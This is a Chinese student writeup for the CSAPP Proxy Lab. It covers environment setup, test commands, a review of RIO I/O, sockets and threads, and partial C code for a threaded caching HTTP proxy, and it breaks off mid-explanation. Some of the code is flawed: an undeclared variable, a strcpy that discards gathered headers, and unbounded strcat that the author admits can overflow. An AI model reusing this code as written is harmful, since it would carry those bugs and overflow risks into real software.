  • 实现代理,通过输入参数获取监听端口号并监听,接受客户端的连接请求,建立连接并转发请求到服务端,同时可以接受服务端的响应并转发到客户端,只要求实现 HTTP GET 方法。
  • 实现并发,即可以同时处理多个客户端的请求。可以选择基于 I/O 多路复用或者多线程(推荐)实现。
  • 实现缓存,即可以缓存服务端的响应,当客户端再次请求时,可以直接从缓存中获取响应并返回给客户端,而不需要再次向服务端请求。缓存替换策略要求实现为 LRU(Least Recently Used,最近最少使用)。

注意,本文的所有配置、指令均以 Ubuntu 环境为例,而且假设你不具有桌面环境,只有纯命令行环境。

环境配置

本地测评 Proxy Lab 需要额外安装如下工具(若使用 Class Machine 可以跳过本章):

  • Chrome:Linux 下的 Chrome 浏览器,选择 .deb 格式(Ubuntu / Debian),你可以下载下来使用 ftp 上传,也可以直接在服务器使用命令行安装(注意实际下载 URL 可能会变动,如我们这年 writeup 上给的指令就不可用)。

    wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
    sudo dpkg -i google-chrome-stable_current_amd64.deb
    rm google-chrome-stable_current_amd64.deb
    

    一定注意要移除 .deb 文件,否则 make handin 制作上传文件的时候可能会导致打包文件过大,无法上传。

  • Chrome Driver:Chrome 浏览器的驱动,用于实现自动化测试。千万要注意你所下载的版本要和 Chrome 版本相匹配,否则会报错。你可以在 适配性检查网址 检查适配性、找到对应的下载 URL,然后使用如下命令行安装,注意其中的 URL 可能需要替换,请自行检查:

    wget https://edgedl.me.gvt1.com/edgedl/chrome/chrome-for-testing/120.0.6099.109/linux64/chromedriver-linux64.zip
    unzip chromedriver-linux64.zip
    rm chromedriver-linux64.zip
    sudo mv chromedriver /usr/local/bin/
    

    最后一行命令是将 chromedriver 移动到 /usr/local/bin/ 目录(即默认环境变量 $PATH 检索的位置)下,这样就可以在任意目录下使用 chromedriver 命令用以启动驱动。

  • Selenium:Selenium 是一个自动化测试工具,可以用于模拟浏览器行为。如果你之前接触过爬虫,你可能会比较熟悉这个框架。这个框架用以启动测试的 Python 脚本 webdriver_test.py,你可以使用如下命令行安装(如果安装不畅,请考虑使用第二行换源指令):

    pip3 install selenium
    # 使用清华源
    pip3 install selenium -i https://pypi.tuna.tsinghua.edu.cn/simple
    

测试指令

Proxy lab 实现的是个中介服务器,那么我们怎么对写好的服务器进行测试呢?这就需要我们在远程服务器上再启动一个真实的内容服务器,即 tiny 服务器。

# 编译,不更改工作目录
(cd ./tiny && make clean && make)
# 默认前台运行,推荐使用此法+新建终端方便查看日志
cd ./tiny && ./tiny 7778
# 直接后台运行
cd ./tiny && ./tiny 7778 & cd ..

一定要注意, tiny.c./tiny 目录下,且编译出来的可执行文件也一定要在 ./tiny 目录下执行,否则会遇到找不到文件的问题。

如上命令使用 make 命令编译 tiny 服务器(以括号包裹命令,不更改 $PWD 工作目录),然后在 ./tiny 目录下使用 ./tiny 7778 命令启动内容服务器,其中 7778 是内容服务器端口号,如果已经被占用,你可以自行修改。

另外第三行看似在 ./tiny 7778 &cd .. 之间少了一个 && 连接,但是实际上这反而是正确做法,因为标志后台运行的 & 和命令连接的 && 不能连着同时使用。

正如我们在 Tsh lab 中学到的一样,直接运行一个命令会默认在前台运行,这会导致我们前台进程被占用,此时你可以新开一个终端(推荐,因为可以方便的使用切换终端的方式查看服务器 / 代理服务器的日志输出),或者使用如下指令的搭配:

Ctrl-Z
jobs
bg %1
fg %1

其中:

  • Ctrl-Z 会将前台进程挂起(回忆第八章 ECF 的信号一节,这会发送 SIGTSTP 信号到前台进程组的每个进程)
  • jobs 会显示当前的任务,此处 1 就是 tiny 的 job 编号。
  • bg %1 会将挂起的进程转移到后台运行
  • fg %1 会将后台进程转移到前台运行。

其他的方法,则是使用 pm2 等进程管理工具来守护进程,随时查看 log,可能会更加方便,但是考虑到对于 Class Machine 并不适用(无法链接外网),这里不再赘述。

而当你新启动一个终端后(或者通过挂起内容服务器重新获得前台执行权限),假设你已经完成了 Proxy Lab 的实现,那么你就可以使用如下指令来启动你的代理服务器:

# 编译 & 执行
make clean && make && ./proxy 7777 &

其中 7777 是你的代理服务器的监听端口号,你可以自行修改。

然后,你还是可以通过新建一个终端,或者使用上文提到的进程管理操作,重新获得前台执行。

此时,你就可以使用 curl 来使用代理服务器访问内容服务器了:

# 访问 tiny 服务器
curl -v --proxy http://localhost:7777 http://localhost:7778/
# 访问百度,假定你的代理服务器可以访问外网、不支持 HTTPS
curl -v --proxy http://localhost:7777 http://www.baidu.com/

此处还有一个小技巧就是可以使用 VS Code 的端口转发功能,这样你就可以在本地使用 curl 命令了。

配好环境、写好代码后,你就可以使用如下测试指令进行自动评测啦:

make clean && make && ./driver.sh

完成了以上的配置,且熟悉了如何使用命令行对你的代理服务器进行测试后,你就可以真正开始你的 Proxy Lab 之旅啦!

知识回顾

Proxy Lab 的完成,依赖于我们对于系统级 I/O、网络编程、并发编程这三章知识的掌握。

坦白来讲,完成 Proxy Lab 所需要自己独立实现的代码量极其有限,且几乎都是字符串处理等没有什么技术含量的操作,所以只要你完全的理解了整个代理服务器的工作流程,基于书上给出的两段示例代码,你完全有可能花费比之前的 lab 少很多的时间就能完成这个 lab。

因而,本文会在知识回顾这一节相对多地分配一些笔墨,希望能够帮助你更好的理解书本上的内容,从而又快又好地完成这个 lab。

理解如下这张图,是完成本 lab 的基础。

scoketio

系统级 I/O

系统级 I/O 主要会涉及到 RIO 包的使用,关于 RIO 包,可能很多同学(即使是读完代码后)都会有疑惑,为什么要额外的做一个这样的包来封装系统级 I/O,而不是直接使用系统级 I/O 呢?

想要回答这个问题,就不得不先阅读如下两段代码:

// rio_readn - 健壮地读入 n 个字节,无缓冲区
ssize_t rio_readn(int fd, void *usrbuf, size_t n) {
    size_t nleft = n;
    ssize_t nread;
    char *bufp = usrbuf;

    while (nleft > 0) {
        if ((nread = read(fd, bufp, nleft)) < 0) {
            if (errno == EINTR) /* 由于信号处理程序返回而中断 */
                nread = 0;     /* 再次调用read()函数 */
            else
                return -1; /* 由 read() 设置的 errno */
        } else if (nread == 0)
            break; /* EOF */
        nleft -= nread;
        bufp += nread;
    }
    return (n - nleft); /* 返回值 >= 0 */
}

这段代码的核心在于 while 循环会在读入被信号处理函数中断时,尝试重新读入。并且可以自动处理不足值,尤其是 EOF 的情况,这就是健壮性的来源。

而带缓冲区的 rio_read 函数则是在 rio_readn 的基础上,增加了缓冲区,从而减少了系统调用的次数,提高了效率:

// rio_t - 自定义的带缓冲区的读入结构体
typedef struct {
    int rio_fd;                /* 描述符 */
    ssize_t rio_cnt;           /* 缓冲区中未读字节数 */
    char *rio_bufptr;          /* 下一个未读字节 */
    char rio_buf[RIO_BUFSIZE]; /* 缓冲区 */
} rio_t;

// rio_read - 健壮地读入 n 个字节,不带缓冲区
static ssize_t rio_read(rio_t *rp, char *usrbuf, size_t n) {
    int cnt;

    while (rp->rio_cnt <= 0) { /* 重新填充缓冲区 */
        rp->rio_cnt = read(rp->rio_fd, rp->rio_buf, sizeof(rp->rio_buf));
        if (rp->rio_cnt < 0) {
            if (errno != EINTR) /* 由于信号处理程序返回而中断 */
                return -1;
        } else if (rp->rio_cnt == 0) /* EOF */
            return 0;
        else
            rp->rio_bufptr = rp->rio_buf; /* 重新初始化缓冲区指针 */
    }

    /* 复制 min(n, rp->rio_cnt) 个字节到用户缓冲区 */
    cnt = n;
    if (rp->rio_cnt < n)
        cnt = rp->rio_cnt;
    memcpy(usrbuf, rp->rio_bufptr, cnt);
    rp->rio_bufptr += cnt;
    rp->rio_cnt -= cnt;
    return cnt;
}

// rio_readnb - 健壮地读入 n 个字节,带缓冲区
ssize_t rio_readnb(rio_t *rp, void *usrbuf, size_t n) {
    size_t nleft = n;
    ssize_t nread;
    char *bufp = usrbuf;

    while (nleft > 0) {
        if ((nread = rio_read(rp, bufp, nleft)) < 0) {
            if (errno == EINTR) /* 由于信号处理程序返回而中断 */
                nread = 0;     /* 再次调用rio_read()函数 */
            else
                return -1; /* 由rio_read()设置的errno */
        } else if (nread == 0)
            break; /* EOF */
        nleft -= nread;
        bufp += nread;
    }
    return (n - nleft); /* 返回值 >= 0 */
}

// rio_readlineb - 健壮地读入一行,带缓冲区
ssize_t rio_readlineb(rio_t *rp, void *usrbuf, size_t maxlen) {
    int n, rc;
    char c, *bufp = usrbuf;

    for (n = 1; n < maxlen; n++) {
        if ((rc = rio_read(rp, &c, 1)) == 1) {
            *bufp++ = c;
            if (c == '\n')
                break;
        } else if (rc == 0) {
            if (n == 1)
                return 0; /* EOF,没有读入任何数据 */
            else
                break; /* EOF,读入了部分数据 */
        } else
            return -1; /* 错误 */
    }
    *bufp = 0;
    return n;
}

rio_readn 的核心思想是,在 while 循环的每一次迭代中,都会尝试重新填充满关联的 rio_t 缓冲区,因而 read 实际读入的字节和所需要的 n 个字节其实没关系,这么做的好处是,当这个 rio_read 函数被多次调用(如 rio_readnbrio_readlineb)时,相当于做了一层对于 read 的缓存,从而可以减少实际系统调用的次数(回想一下,系统调用函数总是需要陷入内核,远比用户调用函数慢),从而提高了效率。

因而,我们知道了为什么每次使用 RIO 包的函数的时候总是需要先声明一个 rio_t 的结构体,并且调用 rio_readinitb 函数来将之与一个文件描述符关联起来。同时也知道了为什么带缓冲区的 rio 函数不能和不带缓冲区的 rio 函数混用,而这经常期末考选择题。

这也是为何从客户端或者服务端发送数据的时候,我们总是使用 rio_writen 函数的原因所在,因为它可以自动处理不足值以及被信号处理函数中断的情况,提高了健壮性;而当我们从客户端或者服务端接收数据的时候,我们总是使用 rio_readnb 函数,因而他它了以上好处之外,还使用了一个缓冲区,从而减少了系统调用的次数,提高了效率。

系统级 I/O 这一章另外一处和 Proxy lab 相关的知识就是,尽管父子进程之间各自私有文件描述符表,但是处于同一个进程内的对等线程总是共享文件描述符表的,因而我们不需要再在线程例程(即分出的逻辑流函数)中首先关闭不需要的侦听文件描述符(这反而会导致错误!),这一点和进程不同。

网络编程

可能很多同学在阅读书上这一章的时候都会感到很困惑,就像我初学的时候总是在好奇为什么我们不能像对于本地文件进行 I/O 处理一样,还要先这么麻烦地使用一大堆函数才行,甚至还和客户端还是服务端有关系,真是让人头大。

其实啊,这也正是让我们完成 Proxy Lab 的目的。因为当你完成 Proxy Lab 、然后又被万恶的期末考试催着多看了几遍书之后,往往你就会深刻的理解这一章的内容了。

首先我们要明确网络编程的本质,就是在两个不同的主机之间进行数据交换。因为我们的主机并不是总是和远程主机之间连了一根网线(回忆一下,这就是局域网 LAN),而是通过路由器、交换机等设备连接到了互联网上,走了一个 LAN - WAN - LAN 的过程,所以我们需要在浩如烟海的互联网中找到我们要通信的主机,这就是 IP 地址的作用。而找到远程主机之后,我们还需要找到远程主机上实际为我们提供服务的进程,这就是端口号的作用。

而 socket (套接字)就是对于这个过程的第一层抽象,它可以把这个链接后的信息传输过程完全隐于幕后,让我们得以像对待本地文件一样对待远程主机上的文件。

// socket - 创建一个 socket
int socket(int domain, int type, int protocol);

注意这个函数签名中的 domain 参数并不是指域名,而是指协议族,即我们要使用的协议,如 AF_INET 就是 IPv4 协议族,AF_INET6 就是 IPv6 协议族。所以这个函数和具体的连接无关,仅仅是约束了连接的类型、协议信息。因而我们不能在创建了 socket 之后立刻进行 UNIX I/O 操作,而是需要先进行 connect(客户端)、 bindlisten(服务端),才能使之真正变成一个可读写的文件描述符。

bindlisten 都需要一个结构体参数,即 sockaddr,这个结构体包含了我们要连接的主机具体信息。而 sockaddr_in,即 IPv4 地址结构体,是 sockaddr 类型的子类。其中包括了我们连接所需要的协议相关信息,即 IP 地址和端口号。

从一个域名获取 IP 地址的过程,就是 DNS 解析的过程,这个过程是由操作系统完成的,我们只需要调用 getaddrinfo 函数即可。在此不再展开更具体的细节,请阅读书上相关内容。值得一提的就是一定要注意区分 getaddrinfogetnameinfo 两个函数,前者是从域名获取 IP 地址,后者是从 IP 地址获取域名,以及 getaddrinfo 获得的解析信息是一个链表,当你使用完之后,亦需要使用 freeaddrinfo 函数释放内存。

虽然但是,上面的内容仅仅只是帮助你理解课内知识,在实际写 Proxy Lab 的时候,我们并不需要操心这些,只需要使用 csapp.h 封装好的函数 open_clientfdopen_listenfd 即可(见上文中的图)。

不过,我们其实还是需要使用一些原生的套接字接口,即 acceptclose,前者用于接受客户端的连接请求,后者用于关闭套接字。

关于 accept 函数,一个值得注意的点是,它其实仅仅是从已经建立连接的队列中取出一个连接(这基于并发编程中提到的 I/O 多路复用),而不是建立连接。建立连接的过程是在 listen 函数中完成的,这个过程是一个被动的过程,即服务端在 listen 函数中等待客户端的连接请求,而不是主动地去连接客户端。这一点和客户端是不同的,客户端是主动地去连接服务端的。而 listen 函数也有一个 LISTENQ 参数,用以规制最大的连接队列长度。

因而只要网络畅通,对于客户端来说,尽管 connect 函数是一个可能阻塞的函数,但是只要服务端已经调用了 listen 函数,那么 connect 函数就不会阻塞,而是会立刻返回。但服务端肯定要先使用 accept 函数取出一个连接才可以开始对应的处理(这就是有道往年题问使用顺序服务器客户端为什么阻塞在 read 而不是 connect 的原因),也是为什么我们需要并发编程而不是顺序编程的原因。

并发编程

书上一共介绍了三种并发编程的方式,分别是基于进程的并发编程、基于 I/O 多路复用的并发编程、基于线程的并发编程。

基于进程的并发编程最容易理解与编写,因为进程之前内存私有,不存在同步问题,省事省心,但是问题在于进程的上下文切换代价太大,而且进程之间的通信(IPC)也比较麻烦(值得一提的是,信号量也是一种 IPC 机制,这在我们这年考了),所以性能不是很好,我们也不推荐使用。

在这种实现方式中,比较值得注意的是,我们需要在父进程中关闭不需要的连接文件描述符(connfd),而在子进程中也需要关闭监听的文件描述符(listenfd),以避免内存泄露。

基于 I/O 多路复用的并发编程,则是使用一个叫做 select 的函数,将多个文件描述符集合(fdset)传入,然后 select 函数会阻塞,直到集合中的某个文件描述符就绪,然后返回就绪的文件描述符集合。这种方式的好处是,它是事件驱动的,我们可以很方便的给各种事件设定处理优先级,而且可以避免进程或者线程的上下文切换开销,性能很高。但是它也具有一个很显著的缺点,就是从逻辑流的角度来讲,它每次只能处理一个事件,很类似于顺序编程,所以也会存在阻塞的问题。

最后一种,则是基于线程的并发编程,这种方式是最推荐的,也是本文所选用的实现方式。通过在一个进程内开多个线程,我们获得了类似于多进程的并发处理能力,同时还能利用线程之间的内存共享机制,避免了线程间通信问题,且线程上下文切换相较于进程上下文切换也更加轻量,性能很高。但是它也有一个缺点,就是线程之间共享内存,所以需要使用互斥锁来保证线程安全以避免同步问题。

而并发编程延伸出的生产者 - 消费者问题,我们会在具体的缓存实现过程中加以讲述。

字符串处理

写 Proxy lab 很大一部分代码量都是毫无技术含量的字符串处理,然而如果我们不熟悉的话,又往往会需要花费很多时间来 Debug,所以在这里我们来提前回顾一下字符串处理的相关知识。

字符串是以 \0 结尾的字符数组,使用 strlen 函数获取字符串长度、打印字符串时,都是以 \0 作为结束标志的。

字符串的一些相关函数的命名都是很有特点的,加 n 代表限制检索范围。

int strcmp(const char *s1, const char *s2);

strcmp:用以比较两个字符串是否相等,相等返回 0,不相等返回非 0 值,其实就是按字典序逐个比较字符,直到遇到不同的字符或者 \0 结束符。注意此函数是区分大小写(大小写敏感)的。

int strcasecmp(const char *s1, const char *s2);

strcasecmp:用以比较两个字符串是否相等,相较于 strcmp,此函数是不区分大小写(大小写不敏感)的。

int strncmp(const char *s1, const char *s2, size_t n);

strncmp:用以比较两个字符串是否相等,相较于 strcmp,此函数是限制检索范围的,即只检索前 n 个字符。

int strncasecmp(const char *s1, const char *s2, size_t n);

strncasecmp:用以比较两个字符串是否相等,既限制检索范围,又不区分大小写。

char *strchr(const char *s, int c);

strchr:用以检索字符串中是否存在字符 c,存在则返回第一次出现的位置的指针,不存在则返回 NULL。

char *strcpy(char *dest, const char *src);

strcpy:用以复制字符串,即将字符串 s2 复制到 s1 中,返回 s1 的指针。

char *strncpy(char *dest, const char *src, size_t n);

strncpy:用以复制字符串,相较于 strcpy,此函数是限制检索范围的,即只复制前 n 个字符。

char *strcat(char *dest, const char *src);

strcat:用以连接字符串,即将字符串 s2 连接到 s1 的末尾,返回 s1 的指针。

int sscanf(const char *str, const char *format, ...);

sscanf:用以从字符串中读取格式化输入,即从字符串 str 中读取格式化输入,存储到后面的参数中,返回成功读取的参数个数。

int sprintf(char *str, const char *format, ...);

sprintf:用以将格式化输出写入字符串,即将格式化输出写入字符串 str 中,返回写入的字符个数。

实现思路

正如之前所说,写完 Proxy Lab 所需要自己的代码量可能很少,而且也不太具有什么技术含量,都是些字符串处理之类的东西,只有互斥锁会和书上所讲述的并发编程关系较大。

所以,我在此推荐大家至少阅读书上的如下两段代码:

  • 图 12-14,书 P695,基于线程的并发 echo 服务器,echosevert.c
  • 图 12-26,书 P707,对第一类读者 - 写者问题的解答,读者优先级高于写者

让我们首先来讲解这两段代码中比较重要的细节部分,这对于你理解整个 Proxy Lab 的工作流程是很有帮助的。

线程并发服务器示例

// echoservert.c - 基于线程的并发 echo 服务器
#include "csapp.h"

void echo(int connfd);
void *thread(void *vargp);

int main(int argc, char **argv) {
    int listenfd, *connfdp;
    socklen_t clientlen;
    struct sockaddr_storage clientaddr;
    pthread_t tid;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(0);
    }
    listenfd = Open_listenfd(argv[1]);
    while (1) {
        clientlen = sizeof(struct sockaddr_storage);
        connfdp = Malloc(sizeof(int));
        *connfdp = Accept(listenfd, (SA *)&clientaddr, &clientlen);
        Pthread_create(&tid, NULL, thread, connfdp);
    }
}

void *thread(void *vargp) {
    int connfd = *((int *)vargp);
    Pthread_detach(pthread_self());
    Free(vargp);
    echo(connfd);
    Close(connfd);
    return NULL;
}

这段代码使用 while(1) 无限循环,不断地接受客户端的连接请求,然后为每个连接请求创建一个线程,再在这个线程中处理这个连接请求。

其中,最重要的一个细节就是 connfdp 一定是每次循环的时候都要重新分配内存的。因为 Pthread_create 是一个异步函数,它会立刻返回,所以在实际进入 thread 函数使用 connfd 的值与下一次循环体的执行中更改 connfd 的值之间是存在竞争的,而如果我们每次循环使用内存分配,调用 Pthread_create 时,直接传入一个新的指针(回忆一下,此函数最后一个参数是指向创建线程例程所需要参数的指针),那就能避免这个问题。当然你也可以直接将 Accept 得到的 connfd 直接通过强制类型转换 “假装” 他是一个指针,然后再在 thread 函数中将其转回来,这也是可行的。

第一类读者 - 写者问题

// reader-priority.c - 第一类读者-写者问题的解答,读者优先级高于写者
/* 全局变量 */
int readcnt; /* 共享变量,记录当前正在读取的读者数量 */
sem_t mutex, w; /* 两个信号量,分别用于互斥访问 readcnt 和写者优先级 */

void reader(void) {
    while (1) {
        P(&mutex);
        readcnt++;
        if (readcnt == 1)
            P(&w); /* 阻塞写者 */
        V(&mutex);

        /* 读取数据 */

        P(&mutex);
        readcnt--;
        if (readcnt == 0)
            V(&w); /* 释放写者 */
        V(&mutex);
    }
}

void writer(void) {
    while (1) {
        P(&w); /* 阻塞读者和写者 */
        /* 写入数据 */
        V(&w); /* 释放读者和写者 */
    }
}

这段代码使用两个 while 循环,通过 while 循环间的竞争来模拟读者和写者到达顺序的竞争(不确定性)。

有关信号量,我认为最重要的一个思想就是,信号量可以用于确定某个状态一定不可到达(即信号量为负的情况),从而约束了一个临界区。这个思想能够指导你阅读代码,而且做往年题的时候很有用。

比如,为什么对于队列问题时,我们需要两个信号量?按照我的理解,两个信号量一个为队列长度(约束了生产者过多,使得队列溢出的情况),以及一个为队列空闲长度(约束了消费者过多,使得队列消费到变负的情况),这样我们就相当于堵死了队列溢出和队列消费到变负的情况,从而保证了队列的安全性。

在读者的函数中,我们总是保证只要有读者存在,读者们就一定能通过获得并持有 w 锁,来保证写者无法进行操作,这是通过给出如下两条规则实现的:

  • 只有第一个进入的读者会让读者们整体获得 w 锁,从而阻塞写者
  • 只有最后一个离开的读者会让读者们整体释放 w 锁,从而释放写者

我们以这两段代码为起点,开始实现我们自己的 HTTP 代理服务器。

实现过程

啥也不用说,先 merge 一下 handout 中给出的 Proxy.cechoservert.c

同时,我们规定两个自定义类型、结构体,提前声明好所需要的几个函数,以及一些全局变量。

基本结构

/*
 * proxy.c - 一个简单的 HTTP 代理服务器,实现了基于线程的并发与缓存
 *
 * name:    Arthals
 * id:      2110306206
 * mail:    2110306206@stu.pku.edu.cn
 */
#include "csapp.h"
#include "cache.h"

 /* Recommended max cache and object sizes */
#define MAX_CACHE_SIZE 1049000
#define MAX_OBJECT_SIZE 102400

/* You won't lose style points for including this long line in your code */
static const char* user_agent_hdr = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3\r\n";

// 自定义类型
typedef char string[MAXLINE];
typedef struct {
    string host;
    string port;
    string path;
}url_t;

// 自定义函数签名
void* thread(void* vargp);
void do_get(rio_t* client_rio_p, string url);
int parse_url(string url, url_t* url_info);
int parse_header(rio_t* client_rio_p, string header_info, string host);

/*
 * main: 主函数
 * 创建监听套接字,循环接收请求,创建线程处理请求
 */
int main(int argc, char** argv) {
    // 忽略SIGPIPE信号
    signal(SIGPIPE, SIG_IGN);

    int listenfd, * connfd;
    socklen_t clientlen;
    struct sockaddr_storage clientaddr;

    pthread_t tid;

    // 检查参数
    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }

    // 创建监听套接字,此处可以使用包装函数,因为遇到错误时就应当调用exit(0)退出进程
    listenfd = Open_listenfd(argv[1]);

    init_cache();
    // 循环接收请求
    while (1) {
        clientlen = sizeof(clientaddr);
        // 每次循环使用 malloc 从而实现基于线程的并发服务器
        // 不使用局部变量,因为局部变量会导致线程间共享同一块内存,从而导致竞争
        connfd = (int*)malloc(sizeof(int));
        // 不使用 Accept 包装函数,因为其在遇到错误时会调用unix_error,从而使用exit(0)退出进程
        *connfd = accept(listenfd, (SA*)&clientaddr, &clientlen);
        if (*connfd < 0) {
            fprintf(stderr, "Accept Error: %s\n", strerror(errno));
            continue;
        }
        // 创建线程处理请求
        pthread_create(&tid, NULL, thread, connfd);
    }
    close(listenfd);
}

/**
 * thread: 使用线程处理请求,实现并发
 * @param vargp,指向客户端套接字描述符的指针
 */
void* thread(void* vargp){
    // 不使用任何的包装函数,因为若错误处理函数导致线程调用exit(0),会终止整个进程
    // 分离自身线程
    pthread_detach(pthread_self());

    // 把局部变量存储线程栈,释放动态分配的参数,防止内存泄漏
    int client_fd = *((int*)vargp);
    free(vargp);

    // 处理请求
    do_get(connfd);

    // 关闭连接
    close(connfd);
    return NULL;
}

这段代码整体是同书上的 echoservert.c 一致的。开头引入了 cache.h,这是我们自己实现的缓存模块,后面会详细讲解。

额外声明一个 string 的类型是很有用的,不然你会需要写很多个 char[MAXLINE],这会让人很头大。

正如 writeup 所要求的,我们的代码要保证健壮性,所以我们需要在 main 函数中忽略 SIGPIPE 信号,这个信号会在我们向一个已经关闭的连接写入数据时触发,而且默认的处理方式是终止进程,这显然不是我们所希望的,这处细节在书 P677、P678 有所提及。

另外一个尤其需要注意的编程细节是,我们在线程内一定要尽量避免使用任何的包装函数,因为这些包装函数在遇到错误时会调用 unix_error 函数,而这个函数会调用 exit(0) ,这会导致任何一个线程的错误直接终止整个进程!

// csapp.h
void Close(int fd) {
    int rc;

    if ((rc = close(fd)) < 0)
        unix_error("Close error");
}
void unix_error(char* msg) /* Unix-style error */
{
    fprintf(stderr, "%s: %s\n", msg, strerror(errno));
    exit(0);
}

注:草,写到这里重新读源代码的时候发现实际分发的 csapp.c 中,这里的 exit(0) 一行被注释掉了,所以其实没有关系?

处理请求

考虑我们应当如何处理一个请求。我们的每个线程例程获得参数都是已经可以用以同客户端进行读写的文件描述符,所以我们需要先读取客户端的请求,然后解析出其中的 URL,然后再向服务器发送请求,最后将服务器的响应转发给客户端。

结合书 11.5 章,回想一个 HTTP GET 请求报文的格式:

  • 一行请求行(request line)

    GET /path HTTP/1.1
    

    其中有三个字符串:请求方法(method)、请求路径(path)、HTTP 版本(version),以空格分隔,以 \r\n 标记结束。

  • 任意行请求头部(header)

    Host: hostname
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3
    Connection: close
    Proxy-Connection: close
    
    

    其中每一行都是一个字符串,以冒号分隔,前者为字段名,后者为字段值。每一行都以 \r\n 标记结束,最后以一行空行,即只有 \r\n 的行标记请求头结束。

于是,我们按照这个格式,写出代码:

/**
 * thread: 使用线程处理请求,实现并发
 * @param vargp,指向客户端套接字描述符的指针
 */
void* thread(void* vargp) {
    // 不使用任何的包装函数,因为若错误处理函数导致线程调用exit(0),会终止整个进程
    // 分离自身线程
    pthread_detach(pthread_self());

    // 把局部变量存储线程栈,释放动态分配的参数,防止内存泄漏
    int client_fd = *((int*)vargp);
    free(vargp);

    // 初始化客户端缓冲区 rio
    rio_t client_rio;
    string buf;
    rio_readinitb(&client_rio, client_fd);

    // 读取客户端内容到 buf
    if (rio_readlineb(&client_rio, buf, MAXLINE) <= 0) {
        fprintf(stderr, "Read request line error: %s\n", strerror(errno));
        close(client_fd);
        return NULL;
    }

    // 解析请求行
    string method, url, http_version;
    if (sscanf(buf, "%s %s %s", method, url, http_version) != 3) {
        fprintf(stderr, "Parse request line error: %s\n", strerror(errno));
        close(client_fd);
        return NULL;
    }
    // 检查是否为 GET 方法
    if (!strcasecmp(method, "GET")) {
        do_get(&client_rio, url);
    }
    close(client_fd);
    return NULL;
}

在这段代码中,我们首先使用 pthread_detach 函数分离自身线程,这可以让线程结束时自动释放资源,而不需要在初始线程中使用 pthread_join 函数。

然后,我们使用 rio_readlineb 函数读取一行请求行,然后使用 sscanf 函数解析出其中的三个字符串,即请求方法、请求路径、HTTP 版本,并存入一个先前定义的 url_t 结构体参数 url 中。然后我们检查请求方法是否为 GET 方法,如果是则调用 do_get 函数处理请求然后关闭连接,否则直接关闭连接。

注意,比较两个字符串是否相等的方法是判断 strcasecmp 函数的返回值是否为 0,所以要取反,即(!strcasecmp)。另外推荐的编程方式是每次都显式地关闭连接。

解析请求行

/**
 * parse_url - 解析 url
 * @param url,请求的url
 * @param url_info,解析结果的存储位置
 */
int parse_url(string url, url_t* url_info) {
    // 检查是否为 HTTP 协议
    const int http_prefix_len = strlen("http://");
    if (strncasecmp(url, "http://", http_prefix_len)) {
        fprintf(stderr, "Not http protocol: %s\n", url);
        return -1;
    }
    // 检查是否为合法的url
    char* host_start = url + http_prefix_len;
    char* port_start = strchr(host_start, ':');
    char* path_start = strchr(host_start, '/');

    // 非法url
    if (path_start == NULL) {
        return -1;
    }

    // 没有端口号,设置默认端口为 80
    if (port_start == NULL) {
        *path_start = '\0';
        strcpy(url_info->host, host_start);
        strcpy(url_info->port, "80");
        *path_start = '/';
        strcpy(url_info->path, path_start);
    }

    // 有端口号
    else {
        *port_start = '\0';
        strcpy(url_info->host, host_start);
        *port_start = ':';
        *path_start = '\0';
        strcpy(url_info->port, port_start + 1);
        *path_start = '/';
        strcpy(url_info->path, path_start);
    }

    return 0;
}

这段代码看似毫无技术含量,但是恰恰是最容易出错的地方。

处理字符串的时候,往往总是被各种边界条件(即 \0 的位置)搞混,一个技巧是要么在脑子中要么在纸上,先把整个字符数组模拟出来,然后再进行处理。

注意这里,我们使用了多个指针指向字符串中的不同位置,以确立检索界限,其中也引用这些指针对字符串做了修改,所以在我们返回前,一定要恢复字符串的原始状态,否则可能回导致后续对于 URL 字符串的使用出现问题。

这里还存在着一个阴间技巧,后续我们会提到。

解析请求头

/**
 * parse_header - 解析请求头
 * @param client_rio_p,指向客户端rio的指针
 * @param header_info,解析结果的存储位置
 * @param host,先前解析出的请求的host,作为Host头的默认值
 */
int parse_header(rio_t* client_rio_p, string header_info, string host) {
    string buf;
    int has_host_flag = 0;
    while (1) {
        rio_readlineb(client_rio_p, buf, MAXLINE);
        // 遇到结束行
        if (strcmp(buf, "\r\n") == 0) {
            break;
        }
        // 如果遇到 Host 头,记录之,后续不再添加 Host 头
        if (!strncasecmp(buf, "Host:", strlen("Host:"))) {
            has_host_flag = 1;
        }
        // 如果遇到 Connection 头、Proxy-Connection 头、User-Agent 头,直接跳过,后续替换为默认值
        if (!strncasecmp(buf, "Connection:", strlen("Connection:"))) {
            continue;
        }
        if (!strncasecmp(buf, "Proxy-Connection:", strlen("Proxy-Connection:"))) {
            continue;
        }
        if (!strncasecmp(buf, "User-Agent:", strlen("User-Agent:"))) {
            continue;
        }
        // 其他头与 Host 头直接添加
        strcat(header_info, buf);
    }
    // 如果没有 Host 头,添加 Host 头
    if (!has_host_flag) {
        sprintf(buf, "Host: %s\r\n", host);
        strcpy(header_info, buf);
    }
    // 添加 Connection 头、Proxy-Connection 头、User-Agent 头
    strcat(header_info, "Connection: close\r\n");
    strcat(header_info, "Proxy-Connection: close\r\n");
    strcat(header_info, user_agent_hdr);
    // 添加结束行
    strcat(header_info, "\r\n");
    return 0;
}

这段代码通过使用一个无限循环来不断地读取请求头,并按照 writeup 的要求,将 Connection 头、Proxy-Connection 头、User-Agent 头替换为默认值,如果客户端请求头里没有 Host 头,则添加 Host 头,否则保留原 Host 头。

这里存在一个来自助教的 恶意测试点,其请求头会特别长(超过 MAXLINE,即 8192 个字符),这会导致我们对于 header_info 这个字符串的操作溢出。

因而,我们要么在后续添加对于这一情况的处理(安全性判断),要么提前建立与服务器的链接并及时转发,或者使用别的方式避免,要么直接使用如下的阴间技巧:

